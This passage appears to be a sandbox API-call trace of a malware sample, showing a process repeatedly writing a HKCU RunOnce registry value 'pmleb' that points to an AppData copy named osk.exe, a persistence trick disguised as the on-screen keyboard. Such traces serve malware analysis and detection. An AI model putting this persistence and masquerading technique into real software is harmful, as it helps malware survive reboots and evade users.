lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.863] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.863] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.864] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.864] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.864] RegCloseKey (hKey=0x280) returned 0x0 [0080.864] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.864] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.864] SetTimer (hWnd=0x20280, nIDEvent=0x2092, uElapse=0xa, lpTimerFunc=0x0) returned 0x2092 [0080.864] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.876] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.876] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.876] KillTimer (hWnd=0x20280, uIDEvent=0x2092) returned 1 [0080.876] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.876] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.876] IUnknown:Release (This=0x787518) returned 0x1 [0080.876] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.877] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.877] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.877] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.877] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.877] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.877] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.877] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.877] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.877] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x17 [0080.877] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.877] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x18 [0080.877] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.878] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x17 [0080.878] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.878] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.878] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.878] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.878] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.879] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.879] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.879] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.879] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.879] RegCloseKey (hKey=0x280) returned 0x0 [0080.879] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.879] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.879] SetTimer (hWnd=0x20280, nIDEvent=0x2093, uElapse=0xa, lpTimerFunc=0x0) returned 0x2093 [0080.879] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.891] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.891] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.892] KillTimer (hWnd=0x20280, uIDEvent=0x2093) returned 1 [0080.892] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.892] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.892] IUnknown:Release (This=0x787518) returned 0x1 [0080.892] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.892] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.892] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.892] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.892] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.892] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.893] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.893] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.893] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.893] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x18 [0080.893] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.893] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x19 [0080.893] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.894] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x18 [0080.894] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.894] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.894] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.894] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.894] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.894] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.894] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.895] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.895] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.895] RegCloseKey (hKey=0x280) returned 0x0 [0080.895] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.895] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.895] SetTimer (hWnd=0x20280, nIDEvent=0x2094, uElapse=0xa, lpTimerFunc=0x0) returned 0x2094 [0080.895] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.907] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.907] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.907] KillTimer (hWnd=0x20280, uIDEvent=0x2094) returned 1 [0080.908] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.908] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.908] IUnknown:Release (This=0x787518) returned 0x1 [0080.908] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.908] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.908] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.908] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.908] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.908] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.908] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.908] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.908] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.908] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x19 [0080.909] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.909] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1a [0080.909] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.909] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x19 [0080.910] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.910] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.910] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.910] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.910] SetErrorInfo (dwReserved=0x0, 